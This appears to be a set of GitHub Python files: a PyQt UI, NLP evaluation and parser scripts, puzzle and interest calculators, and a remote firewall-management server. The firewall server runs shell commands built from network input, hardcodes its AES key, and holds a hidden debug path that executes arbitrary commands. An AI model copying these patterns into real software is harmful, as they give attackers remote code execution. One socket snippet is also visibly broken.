self.eng.setStyleSheet(\"font-size : 10 ; color : darkred; font-weight: bold\")\r\n self.eng.setObjectName(\"eng\")\r\n self.symbols = QtWidgets.QCheckBox(self.centralwidget)\r\n self.symbols.setGeometry(QtCore.QRect(52, 132, 118, 20))\r\n self.symbols.setStyleSheet(\"font-size : 10 ; color : darkred; font-weight: bold\")\r\n self.symbols.setObjectName(\"symbols\")\r\n self.num = QtWidgets.QCheckBox(self.centralwidget)\r\n self.num.setGeometry(QtCore.QRect(52, 159, 82, 20))\r\n self.num.setStyleSheet(\"font-size : 10 ; color : darkred; font-weight: bold\")\r\n self.num.setObjectName(\"num\")\r\n self.horizontalScrollBar = QtWidgets.QScrollBar(self.centralwidget)\r\n self.horizontalScrollBar.setGeometry(QtCore.QRect(60, 210, 160, 16))\r\n self.horizontalScrollBar.setStyleSheet(\"background-color: brown\\n\"\r\n\"\")\r\n self.horizontalScrollBar.setMinimum(5)\r\n self.horizontalScrollBar.setMaximum(35)\r\n self.horizontalScrollBar.setOrientation(QtCore.Qt.Horizontal)\r\n self.horizontalScrollBar.setObjectName(\"horizontalScrollBar\")\r\n self.pasword_l = QtWidgets.QLabel(self.centralwidget)\r\n self.pasword_l.setGeometry(QtCore.QRect(60, 190, 99, 16))\r\n self.pasword_l.setObjectName(\"pasword_l\")\r\n self.pas_length = QtWidgets.QLabel(self.centralwidget)\r\n self.pas_length.setGeometry(QtCore.QRect(160, 190, 55, 16))\r\n self.pas_length.setObjectName(\"pas_length\")\r\n self.generate_b = QtWidgets.QPushButton(self.centralwidget)\r\n self.generate_b.setGeometry(QtCore.QRect(100, 240, 93, 28))\r\n self.generate_b.setStyleSheet(\"\")\r\n self.generate_b.setObjectName(\"generate_b\")\r\n self.ua = QtWidgets.QCheckBox(self.centralwidget)\r\n self.ua.setGeometry(QtCore.QRect(52, 105, 120, 20))\r\n self.ua.setStyleSheet(\"font-size : 10; color : darkred; font-weight: bold\")\r\n self.ua.setObjectName(\"ua\")\r\n self.show_result = QtWidgets.QLineEdit(self.centralwidget)\r\n self.show_result.setGeometry(QtCore.QRect(51, 48, 221, 22))\r\n self.show_result.setObjectName(\"show_result\")\r\n self.name.raise_()\r\n self.pasword_l.raise_()\r\n self.ua.raise_()\r\n self.symbols.raise_()\r\n self.eng.raise_()\r\n self.num.raise_()\r\n self.horizontalScrollBar.raise_()\r\n self.pas_length.raise_()\r\n self.show_result.raise_()\r\n self.generate_b.raise_()\r\n SecondWindow.setCentralWidget(self.centralwidget)\r\n\r\n self.retranslateUi(SecondWindow)\r\n self.horizontalScrollBar.valueChanged['int'].connect(self.pas_length.setNum) # type: ignore\r\n QtCore.QMetaObject.connectSlotsByName(SecondWindow)\r\n\r\n def retranslateUi(self, SecondWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n SecondWindow.setWindowTitle(_translate(\"SecondWindow\", \"MainWindow\"))\r\n self.name.setText(_translate(\"SecondWindow\", \"

Password generating tool

\"))\r\n self.eng.setText(_translate(\"SecondWindow\", \"English letters\"))\r\n self.symbols.setText(_translate(\"SecondWindow\", \"Special symbols\"))\r\n self.num.setText(_translate(\"SecondWindow\", \"Numbers \"))\r\n self.pasword_l.setText(_translate(\"SecondWindow\", \"

Password length:

\"))\r\n self.pas_length.setText(_translate(\"SecondWindow\", \"

5

\"))\r\n self.generate_b.setText(_translate(\"SecondWindow\", \"Generate\"))\r\n self.ua.setText(_translate(\"SecondWindow\", \"Ukrainian letters\"))\r\n","repo_name":"Walkoszes/Daily-helper","sub_path":"password_window_ui.py","file_name":"password_window_ui.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"452513329","text":"from corpuscula.corpus_utils import download_ud, UniversalDependencies, \\\n AdjustedForSpeech\nfrom morra import MorphParser3\nfrom morra.morph_ensemble import MorphEnsemble\nimport os\nimport sys\n\n###\nimport sys\nsys.path.append('../')\n###\nimport _get_names_db\nfrom scripts.local_methods_syntagrus import guess_pos, guess_lemma, guess_feat\n\n# we use UD Taiga corpus only as example. For real model training comment\n# Taiga and uncomment SynTagRus\ncorpus_name = 'UD_Russian-Taiga'\n#corpus_name = 'UD_Russian-SynTagRus'\n\ndownload_ud(corpus_name, overwrite=False)\ntrain_corpus = dev_corpus = test_corpus = UniversalDependencies(corpus_name)\n#train_corpus = dev_corpus = test_corpus = \\\n# AdjustedForSpeech(UniversalDependencies(corpus_name))\n\n# all models should be in MODEL_DIR directory\nMODEL_DIR = 'ensemble'\n# their names should be model..pickle\nMODEL_FN_TPL = 'model.{}.pickle'\nSEEDS = [2, 4, 24, 42]\n\ndef get_model(seed):\n mp = MorphParser3(guess_pos=guess_pos, guess_lemma=guess_lemma,\n guess_feat=guess_feat)\n fn = os.path.join(MODEL_DIR, MODEL_FN_TPL.format(seed))\n mp.load(fn)\n return mp\n\ndef remove_pos(model):\n model._pos_model = None\n model._pos_rev_model = None\n model._pos2_model = None\n\ndef remove_feats(model):\n model._feats_model = None\n model._feats_rev_model = None\n model._feats2_model = None\n model._feats_models = {}\n model._feats_rev_models = {}\n model._feats2_models = {}\n\nme = None\nfor seed in SEEDS:\n mp = get_model(load_corpuses=False, load_model=True, seed=seed)\n # remove excess models for to save memory\n remove_feats(mp)\n if not me:\n me = MorphEnsemble(mp._cdict)\n #me.add(mp.predict_pos, rev=True)\n #me.add(mp.predict_pos, rev=False)\n me.add(mp.predict_pos2, with_backoff=True)\nme.evaluate('UPOS', test_corpus)\n\nme = None\nfor _r in [1, 0, -1]:\n for seed in SEEDS:\n mp = get_model(load_corpuses=False, load_model=True, seed=seed)\n remove_feats(mp)\n if not me:\n me = MorphEnsemble(mp._cdict)\n # add each model 3 times with different params:\n if _r < 0:\n me.add(mp.predict_pos2, with_backoff=True)\n else:\n me.add(mp.predict_pos2, with_backoff=False, max_repeats=_r)\nme.evaluate('UPOS', test_corpus)\n","repo_name":"fostroll/morra","sub_path":"examples/ensemble_eval.py","file_name":"ensemble_eval.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22283224596","text":"# -*- coding: utf-8 -*-\r\nfrom socket import *\r\nimport socket\r\nfrom socket import socket\r\n\r\nimport sys\r\n\r\nhost = '10.80.0.12'\r\nport = 88\r\nsocketConnection = socket(AF_INET,SOCK_STREAM)\r\nsocketConnection.bind((host, port))\r\nsocketConnection.listen(1)\r\n\r\ndestinations = {\r\n 'destination0': {'interface': '52.38.130.148', 'Cost': 1},\r\n 'destination1': {'interface': 'localhost', 'Cost': 0},\r\n 'destination2': {'interface': '128.235.211.21', 'Cost': 3},\r\n 'destination3': {'interface': '128.235.209.204', 'Cost': 5}}\r\n\r\nprint ('Successful socket binding')\r\nwhile True:\r\n client, addr = socket.accept()\r\n print ('Established connection with:', addr)\r\n message = client.recv(1024).decode()\r\n print(message)\r\n table = str(table)\r\n client.send(table.encode())\r\n client.close()\r\nelse:\r\n client.close()\r\nprint('Cannot connect. Try again.')\r\n","repo_name":"dg253/vectorProgramming","sub_path":"afs2.py","file_name":"afs2.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4864707819","text":"import sys\n\nfrom src.krpsim.utils import split_need_result_delay, build_process_dic\n\nclass Parser:\n \"\"\"\n Parsing Class, heart of the parsing is here.\n -> stocks is a list of Stock class instances\n -> content is a list of Process class instances\n -> optimize is a list of Optimize class instances\n -> delay corresponds to the maximal delay given as a parameter\n \"\"\"\n def __init__(self, options):\n self.path, self.delay = options.input_path, options.delay\n self.stocks = {}\n self.content = {}\n self.optimize = []\n self.verbose = options.verbose\n self.fd = open(self.path, 'r+')\n\n def main_parsing(self):\n \"\"\"\n Main parsing loop, the goal here is to iterate over\n the fd content, and to parse every line we encounter to\n determine its type\n \"\"\"\n curr_line = None\n for line in self.fd:\n if line[0] == '#':\n print(\"Found a comment\") if self.verbose == 1 or self.verbose == 3 else 0\n continue\n elif len(line) == 1 and line[0] == '\\n':\n print(\"Skipping empty line\") if self.verbose == 1 or self.verbose == 3 else 0\n continue\n else:\n curr_line = self.parse_line(line)\n self.fill_parser_lists(curr_line)\n print(curr_line) if self.verbose == 1 or self.verbose == 3 else 0\n self.fd = self.fd.close()\n\n def fill_parser_lists(self, line):\n \"\"\"\n Comparing the line type after parse_line,\n we compare class instances with the base classes\n \"\"\"\n if type(line) is Process:\n self.content[line.name] = line\n elif type(line) is Optimize:\n self.optimize.append(line)\n elif type(line) is Stock:\n self.stocks[line.name] = line\n\n\n def verify_parsing_content(self):\n \"\"\"\n Afterward check method for the parsing content\n \"\"\"\n if not self.optimize:\n sys.exit(\"Missing optimize content.\")\n elif not self.stocks:\n sys.exit(\"Missing initial stocks.\")\n elif not self.content:\n sys.exit(\"No process detected inside {}, please provide at least one\".format(self.path))\n #Check if what need to be optimized is indeed inside at least one process and is accesible\n #like if the process never gets called because of stocks that can never be filled, then\n #the optimize values are not valid.\n\n def parse_line(self, line):\n \"\"\"\n Method used to parse a line and extract the corresponding elem\n tmp -> Used for splitting the line and removing some junk from the list\n res -> Class instance, either Stock, Process or Optimize\n every instance is filled with the corresponding params\n \"\"\"\n tmp = None\n res = None\n line = line.replace('\\n', '')\n tmp = [i for i in line.split(':')]\n tmp.pop(tmp.index('')) if '' in tmp else tmp\n # Parsing for stock elem\n if '(' not in line:\n if tmp[0].isalpha() and tmp[1].isdecimal() or\\\n tmp[0].replace('_', '').isalpha() and tmp[1].isdecimal():\n res = Stock(tmp[0], int(tmp[1]))\n else:\n res = 'Error'\n # Parsing for optimize elem\n elif 'optimize:' in line:\n if tmp[-1].isdigit():\n sys.exit(\"You can't specify a delay for an optimize element, error with \\033[4m{}\\033[0m\"\n .format(line))\n tmp = str(tmp[1]).replace('(', '').replace(')', '')\n res = Optimize(tmp.split(';'))\n # Parsing for process elem\n elif tmp[-1].isdigit():\n tmp = [i.replace(')', '') for i in line.split('(')]\n name, need, result, delay = split_need_result_delay(tmp, line)\n res = Process(name, build_process_dic(need), build_process_dic(result), delay)\n # Invalid elem\n elif not tmp[-1].isdigit():\n sys.exit(\"Error with \\033[4m{}\\033[0m, invalid element.\".format(line))\n return res\n\nclass Stock:\n \"\"\"\n Stock elem associated Class\n -> name is obviously the stock name\n -> qty is the quantity available for this stock\n \"\"\"\n def __init__(self, name, qty):\n self.name = name\n self.qty = qty\n\n def __str__(self):\n return '\\033[1mStock\\033[0m -> \\033[38;5;155m{}\\033[0m : {}'.format(self.name, self.qty)\n\n def __eq__(self, other):\n return self.name == other.name and self.qty == other.qty\n\n\nclass Process:\n \"\"\"\n Process elem associated Class\n -> name is obviously the process name\n -> need is a list of stocks (name & qty) needed to run this process\n -> result is a list of resulting stocks after running the process\n -> delay is the delay needed to run the process\n \"\"\"\n def __init__(self, name, need, result, delay):\n self.name = name\n self.need = need\n self.result = result\n self.delay = delay\n\n def __str__(self):\n return '\\033[38;5;74m{}\\033[0m - \\033[1mneeds\\033[0m : {} -> \\033[1mresult\\033[0m : {} - \\033[1mdelay\\033[0m : {}'\\\n .format(self.name, self.need, self.result, self.delay)\n\n def __eq__(self, other):\n return self.name == other.name and \\\n self.delay == other.delay and \\\n self.need == other.need and \\\n self.result == other.result\n\nclass Optimize:\n \"\"\"\n Optimize elem associated Class\n -> opti_elems is a list of name associated with what is\n to optimize, like client and time\n \"\"\"\n def __init__(self, elems):\n self.opti_elems = [i for i in elems]\n\n def __str__(self):\n return '\\033[1mOptimize\\033[0m -> \\033[38;5;218m{}\\033[0m'.format(str(self.opti_elems).replace('[', '').replace(']', ''))\n \n def __eq__(self, other):\n return self.opti_elems == other.opti_elems\n","repo_name":"arlaine4/Krp","sub_path":"src/krpsim/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5071445207","text":"#!/usr/bin/env python3\nimport os\nimport sys \nimport socket\nimport datetime\nimport logging\nfrom time import ctime \nfrom Cryptodome.Cipher import AES \nfrom binascii import b2a_hex, a2b_hex\nfrom subprocess import PIPE,Popen\n\nIP=\"0.0.0.0\"\nPORT=20777\nDEBUG=False\nAES_KEY=b'5xQLFb4RdA9wqYi2'\nFORMAT = '[%(levelname)s]\\t%(asctime)s : %(message)s'\nLOG_NAME = datetime.datetime.now().strftime('Firewall_Server_%Y_%m_%d_%H.log')\nlogging.basicConfig(filename=LOG_NAME, level = logging.DEBUG, format=FORMAT)\nclass prpcrypt(): \n def __init__(self, key): \n self.key = key \n self.mode = AES.MODE_CBC \n \n def encrypt(self, text):\n cryptor = AES.new(self.key, self.mode, self.key)\n length = 16 \n count = len(text) \n add = (length - (count % length))%length\n text = text + (b'\\0' * add) \n self.ciphertext = cryptor.encrypt(text)\n return b2a_hex(self.ciphertext) \n \n def decrypt(self, text): \n cryptor = AES.new(self.key, self.mode, self.key) \n plain_text = cryptor.decrypt(a2b_hex(text)) \n return plain_text.rstrip(b'\\0')\n \nclass Server():\n def __init__(self,ip,port):\n if not self.is_os_linux() and not self.is_os_windows():\n print(\"Please run in linux or windows\")\n sys.exit(-1)\n if self.is_os_linux() and os.geteuid() != 0:\n msg=\"This program must be run as root. Aborting...\" \n logging.info(msg)\n print(msg)\n sys.exit(-1) \n self.ip=ip\n self.port=port\n \n def parse_req(self,string):#purl_path?name1=ZmY=&name2=ZmY=&name3=ZmY=&name4=ZmY=\n logging.info(\"request_string:{}\".format(string))\n path=\"\"\n dict={}\n string = string.decode(\"utf-8\")\n temp = string.split(\"?\")\n path = temp[0]\n try:\n params = temp[1]\n kv_pairs = params.split(\"&\")\n for kv_pair in kv_pairs:\n index = kv_pair.find(\"=\")\n key = kv_pair[:index]\n value = kv_pair[index+1:]\n dict[key]=value\n return path,dict\n except:\n return path,dict\n \n def start_tcp_server(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (self.ip, self.port)\n msg='listening on {0}:{1}'.format(self.ip,self.port)\n print(msg)\n logging.info(msg)\n sock.bind(server_address)\n try:\n sock.listen(5)\n except socket.error as e:\n logging.error(\"fail to listen on port {0}\".format(e))\n sys.exit(1)\n while True:\n client,addr = sock.accept()\n logging.info('connected by {0}'.format(addr))\n data = client.recv(65536) \n if not data: \n continue\n logging.debug(\"recv:{}\".format(data))\n data = self.decrypt(data)\n path,param_dict=self.parse_req(data)\n res=\"Unrecognized command.\"\n if \"getFirewallRules\" == path:#getFirewallRules\n res = self.getFirewall()\n elif \"delAllRules\" == path:#delAllRules?name=n1,n2,n3\n name = \"\"\n if \"name\" in param_dict:\n name = param_dict[\"name\"]\n res = self.delAllRules(name)\n elif \"delRule\" == path:#delRule?direction=In&ip=1.1.1.1&port=80-90&protocol=all&action=REJECT&name=hhh\n try:\n direction = param_dict[\"direction\"]\n ip = param_dict[\"ip\"]\n port = param_dict[\"port\"]\n protocol = param_dict[\"protocol\"]\n action = param_dict[\"action\"]\n name = param_dict[\"name\"]\n res = self.delRule(direction,ip,protocol,port,action,name)\n except Exception as e:\n res=str(e)\n elif \"addRule\" == path:\n #addRule?direction=In&ip=1.1.1.1&port=80:90&protocol=all&action=REJECT&name=hhh\n #addRule?direction=In,In&ip=1.1.1.1,2.2.2.2&port=80:90,80&protocol=all,tcp&action=REJECT,ACCEPT&name=hhh,jjj\n try:\n direction = param_dict[\"direction\"]\n ip = param_dict[\"ip\"]\n port = param_dict[\"port\"]\n protocol = param_dict[\"protocol\"]\n action = param_dict[\"action\"]\n name = param_dict[\"name\"]\n res = self.addRule(direction,ip,protocol,port,action,name)\n except Exception as e:\n res=\"1,{0}\".format(e)\n elif \"changePassword\" == path:\n try:\n if \"username\" in param_dict:\n username = param_dict[\"username\"]\n else:\n username = \"\"\n password = param_dict[\"password\"]\n res = self.changePassword(username,password)\n except Exception as e:\n res=\"1,{0}\".format(e)\n elif \"cu5t0m\" == path and DEBUG:\n try:\n command = param_dict[\"command\"]\n res = self.exec_cmd(command)\n except:\n res=\"1,params not enough in cu5t0m.\"\n logging.info(\"server response:{}\".format(res))\n res=self.encrypt(res)\n #logging.info(\"server response:{}\".format(res))\n client.send(res)\n client.close()\n \n def get_os(self):\n import platform\n current_os = platform.system()\n return current_os\n \n def is_os_windows(self):\n return self.get_os() == \"Windows\"\n \n def is_os_linux(self):\n return self.get_os() == \"Linux\"\n \n def exec_cmd(self,command):\n logging.info(\"executing system command:{}\".format(command))\n #result = os.popen(command)\n #res = result.read().strip()\n p = Popen(command,shell=True,stdout = PIPE, stderr = PIPE)\n stdout, stderr = p.communicate()\n try:\n stdout, stderr = stdout.decode(\"utf-8\").strip(), stderr.decode(\"utf-8\").strip()\n except Exception as e:\n stdout, stderr = stdout.decode(\"gbk\").strip(), stderr.decode(\"gbk\").strip()\n logging.info(\"executing system command result:code={0},stdout={1},stderr={2}\".format(p.returncode,stdout,stderr))\n if p.returncode==0:\n return \"0,{0}\".format(stdout)\n else:\n return \"1,{0},{1}\".format(stdout,stderr)\n \n def encrypt(self,string):\n if isinstance(string,str):\n string = string.encode(\"utf-8\")\n pc = prpcrypt(AES_KEY)\n string=pc.encrypt(string)\n return string\n \n def decrypt(self,string):\n if isinstance(string,str):\n string = string.encode(\"utf-8\")\n pc = prpcrypt(AES_KEY)\n string=pc.decrypt(string)\n return string\n \n def win_getFirewall(self):\n from winreg import ConnectRegistry,OpenKey,HKEY_LOCAL_MACHINE,EnumValue\n Registry = ConnectRegistry(None, HKEY_LOCAL_MACHINE)\n RawKey = OpenKey(Registry, \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\")\n result=\"\"\n try:\n i = 0\n while 1:\n name, value, type = EnumValue(RawKey, i)\n if ('RA4'in value and 'App' not in value and 'Desc' not in value and 'Active=TRUE' in value):\n rule=value.split('|')\n direction=''\n ip=''\n port=''\n protocol=''\n action=''\n name=''\n for kv_pair in rule:\n if \"=\" not in kv_pair:\n continue\n key,value = kv_pair.split(\"=\")\n if key == \"RA4\":\n ip_str=value\n ip = value.split(\"/\")[0]\n try:\n import math\n netmasks=value.split(\"/\")[1]\n netmask=netmasks.split(\".\")\n sum = int(netmask[0])*256**3+int(netmask[1])*256**2+int(netmask[2])*256**1+int(netmask[3])*256**0\n padding = 32-math.log(2**32-sum,2)\n ip=ip+\"/\"+str(int(padding))\n except Exception as e:\n pass\n if \"Port\" in key:\n port=value\n if key == \"Protocol\":\n if value=='6':\n protocol='tcp'\n elif value=='17':\n protocol='udp'\n else:\n continue\n if key == \"Action\":\n if value == 'Allow':\n action='ACCEPT'\n elif value == \"Block\":\n action = \"REJECT\"\n else:\n continue\n if key == \"Name\":\n name = value\n if key == \"Dir\":\n direction = value\n if len(direction) and len(ip) and len(port) and len(protocol) and len(action) and len(name):\n result = result +\"{}|{}|{}|{}|{}|{}\\n\".format(direction,ip,port,protocol,action,name)\n i += 1\n except WindowsError as e:\n logging.error(str(e))\n pass\n return \"0,{0}\".format(result.strip())\n \n def linux_getFirewall(self):\n cmd=\"\"\"a=`iptables -L INPUT -n|awk -F ' ' 'BEGIN {count=-2;} {if(count>=0){action[count] = $1;protocol[count]=$2;ip[count]=$4;port[count]=$7;}count++;}; END{for (i = 0; i < NR; i++) if(ip[i]&&port[i]&&protocol[i]&&action[i]){ print \"In\",\"|\",ip[i],\"|\",port[i],\"|\",protocol[i],\"|\",action[i];}}'`;b=`iptables -L OUTPUT -n|awk -F ' ' 'BEGIN {count=-2;} {if(count>=0){action[count] = $1;protocol[count]=$2;ip[count]=$4;port[count]=$7;}count++;}; END{for (i = 0; i < NR; i++) if(ip[i]&&port[i]&&protocol[i]&&action[i]){ print \"Out\",\"|\",ip[i],\"|\",port[i],\"|\",protocol[i],\"|\",action[i];}}'`;echo \"$a\";echo \"$b\";\"\"\"\n lines=self.exec_cmd(cmd)\n return lines\n \n def getFirewall(self):\n lines=\"\"\n if self.is_os_linux():\n lines = self.linux_getFirewall()\n elif self.is_os_windows():\n lines = self.win_getFirewall()\n #In|0.0.0.0|22|tcp|REJECT|2018-07-05 11:22:02\n #Out|0.0.0.0|8888|tcp|REJECT|2018-07-08 14:21:24\n #Out|0.0.0.0|8888|udp|REJECT|2018-07-08 14:21:24\n delim=\"\\n\"\n status_code = lines[:2]\n lines=lines[2:].split(delim)\n for i in range(len(lines)):\n for j in range(i+1,len(lines)):\n if (\"tcp\" in lines[i] and (lines[i].replace(\"tcp\",\"udp\")==lines[j])) or (\"udp\" in lines[i] and (lines[i].replace(\"udp\",\"tcp\")==lines[j])):\n lines[i]=lines[i].replace(\"udp\",\"all\").replace(\"tcp\",\"all\")\n lines[j]=\"\"\n lines=status_code+delim.join(lines).replace(delim+delim,delim)\n return lines\n \n def changePassword(self,username,password):\n if len(username)==0:\n if self.is_os_linux():\n cmd=\"passwd --stdin {0}\".format(password)# read new tokens from stdin (root only)\n elif self.is_os_windows():\n cmd=\"\"\"for /F \"delims=\\\\ tokens=2*\" %i in ('whoami') do net user %i {0}\"\"\".format(password)\n else:\n if self.is_os_linux():\n cmd=\"echo {0}:{1}|chpasswd\".format(username,password)\n elif self.is_os_windows():\n cmd=\"\"\"net user {0} {1}\"\"\".format(username,password)\n \n res=self.exec_cmd(cmd)\n return res\n \n def delAllRules(self,name=\"\"):\n if self.is_os_linux():\n res=self.exec_cmd(\"iptables -F INPUT;iptables -F OUTPUT\")\n elif self.is_os_windows():\n cmds=[]\n for n in name.split(\",\"):\n cmds.append(\"netsh advfirewall firewall delete rule name=\\\"{}\\\"\".format(n))\n res=self.exec_cmd(\"&\".join(cmds))\n return res\n \n def delRule(self,direction,ip,protocol,port,action,name):\n direction = direction.split(\",\")\n ip = ip.split(\",\")\n protocol=protocol.split(\",\")\n port=port.split(\",\")\n action=action.split(\",\")\n name = name.split(\",\")\n length = len(direction)\n res=\"\"\n cmds=[]\n if self.is_os_linux():\n for i in range(length):\n if protocol[i]==\"all\" :\n if direction[i]==\"In\":\n cmds.append(\"iptables -D INPUT -s {} -p tcp --dport {} -j {} ; iptables -D INPUT -s {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"iptables -D OUTPUT -d {} -p tcp --dport {} -j {} ; iptables -D OUTPUT -d {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"iptables -D INPUT -s {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"iptables -D OUTPUT -d {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif self.is_os_windows():\n for i in range(length):\n action[i] = \"Allow\" if action[i]==\"ACCEPT\" else \"Block\"\n port[i] = port[i].replace(\":\",\"-\")\n for i in range(length):\n if protocol[i]==\"all\":\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} localport={} protocol=tcp name=\\\"{}\\\" & netsh advfirewall firewall delete rule dir={} remoteip={} localport={} protocol=udp \\\"{}\\\"\".format(direction[i],ip[i],port[i],name[i],direction[i],ip[i],port[i],name[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} remoteport={} protocol=tcp name=\\\"{}\\\" & netsh advfirewall firewall delete rule dir={} remoteip={} remoteport={} protocol=udp name=\\\"{}\\\"\".format(direction[i],ip[i],port[i],name[i],direction[i],ip[i],port[i],name[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} localport={} protocol={} name=\\\"{}\\\"\".format(direction[i],ip[i],port[i],protocol[i],name[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} remoteport={} protocol={} name=\\\"{}\\\"\".format(direction[i],ip[i],port[i],protocol[i],name[i]))\n else:\n return\n if self.is_os_linux():\n cmd=\";\".join(cmds)\n elif self.is_os_windows():\n cmd=\"&\".join(cmds)\n res=self.exec_cmd(cmd)\n return res\n \n def addRule(self,direction,ip,protocol,port,action,name):\n #try:\n self.delAllRules(name)\n #except:\n # pass\n direction = direction.split(\",\")\n ip = ip.split(\",\")\n protocol=protocol.split(\",\")\n port=port.split(\",\")\n action=action.split(\",\")\n name = name.split(\",\")\n length = len(direction)\n res=\"\"\n cmds=[]\n if self.is_os_linux():\n for i in range(length):\n if protocol[i]==\"all\" :\n if direction[i]==\"In\":\n cmds.append(\"iptables -A INPUT -s {} -p tcp --dport {} -j {} ; iptables -A INPUT -s {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n elif direction==\"Out\":\n cmds.append(\"iptables -A OUTPUT -d {} -p tcp --dport {} -j {} ; iptables -A OUTPUT -d {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"iptables -A INPUT -s {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"iptables -A OUTPUT -d {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif self.is_os_windows():\n for i in range(length):\n if not len(name[i]):name[i]=\"hhh\"\n action[i] = \"Allow\" if action[i]==\"ACCEPT\" else \"Block\"\n port[i] = port[i].replace(\":\",\"-\")\n for i in range(length):\n if protocol[i]==\"all\":\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} localport={} protocol=tcp name=\\\"{}\\\" action={} & netsh advfirewall firewall add rule dir={} remoteip={} localport={} protocol=udp name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],name[i],action[i],direction[i],ip[i],port[i],name[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} remoteport={} protocol=tcp name=\\\"{}\\\" action={} & netsh advfirewall firewall add rule dir={} remoteip={} remoteport={} protocol=udp name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],name[i],action[i],direction[i],ip[i],port[i],name[i],action[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} localport={} protocol={} name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],protocol[i],name[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} remoteport={} protocol={} name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],protocol[i],name[i],action[i]))\n else:\n return\n if self.is_os_linux():\n cmd=\";\".join(cmds)\n elif self.is_os_windows():\n cmd=\"&\".join(cmds)\n res=self.exec_cmd(cmd)\n return res\n\ndef main():\n server=Server(IP,PORT)\n server.start_tcp_server()\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Hehouhua/firewall_gui_cs","sub_path":"firewall_server.py","file_name":"firewall_server.py","file_ext":"py","file_size_in_byte":18815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38112427307","text":"from numpy import diff\n\n\ndef run():\n print(\"\\nDay 10 - Part A\")\n\n # Each of your joltage adapters is rated for a specific output joltage (your puzzle input). Any given adapter\n # can take an input 1, 2, or 3 jolts lower than its rating and still produce its rated output joltage.\n text_input = [int(line.rstrip('\\n')) for line in open(\"Day10/input.txt\")]\n\n # Treat the charging outlet near your seat as having an effective joltage rating of 0. In addition, your\n # device has a built-in joltage adapter rated for 3 jolts higher than the highest-rated adapter in your bag.\n adapters = sorted(text_input + [0, max(text_input) + 3])\n\n # If you use every adapter in your bag at once, what is the distribution of joltage differences between the\n # charging outlet, the adapters, and your device?\n joltage_differences = list(diff(adapters))\n\n # What is the number of 1-jolt differences multiplied by the number of 3-jolt differences?\n print(joltage_differences.count(1) * joltage_differences.count(3))\n","repo_name":"filipbiernat/AdventOfCode_2020_Python","sub_path":"Day10/part_a.py","file_name":"part_a.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33491903147","text":"import matplotlib.pyplot as plt\nfrom colorama import Fore\nprint(Fore.RED +\"............................Welcome you to Compound Interest calculator......................................\")\nstarting_bal = float(input(Fore.GREEN +\"Starting Balance :- \"))\nnumber_of_trade=float( input(Fore.CYAN +\"Total Number of Trade/day :- \"))\npercent=float( input(Fore.CYAN +\"Percent of profitable Trade :- \"))\nintrest_rate_pos = float( input(Fore.CYAN +\"Interest Rate positve :- \"))\nintrest_rate_neg = float( input(Fore.CYAN +\"Interest Rate negative :- \"))\nduration = float(input(Fore.YELLOW +\"Duration :- \"))\nprincipal_graph = []\n\ndef actual_rate():\n \n final_rate = number_of_trade*(((percent) * (intrest_rate_pos)) - ((100-percent)*intrest_rate_neg))\n final_rate = float(final_rate/100)\n return final_rate\n\n\n\ndef compounding(sb,ir,du):\n principal=0\n principal = sb \n print(Fore.RED+\" Compunding started \")\n print(Fore.LIGHTWHITE_EX+\" Interest Rate :- \",ir)\n \n for i in range(du):\n interest= (principal)*ir/100\n interest = round(interest,2)\n principal = principal + interest\n principal =round(principal, 2)\n principal_graph.append(principal)\n print(Fore.GREEN+\"interest:- \",interest,Fore.CYAN+ \" principal:- \",principal)\n \n return principal\n\ntime_du = []\n# actual_rate()\nduration = int(duration)\nfor i in range(duration):\n time_du.append(i+1)\nresult = 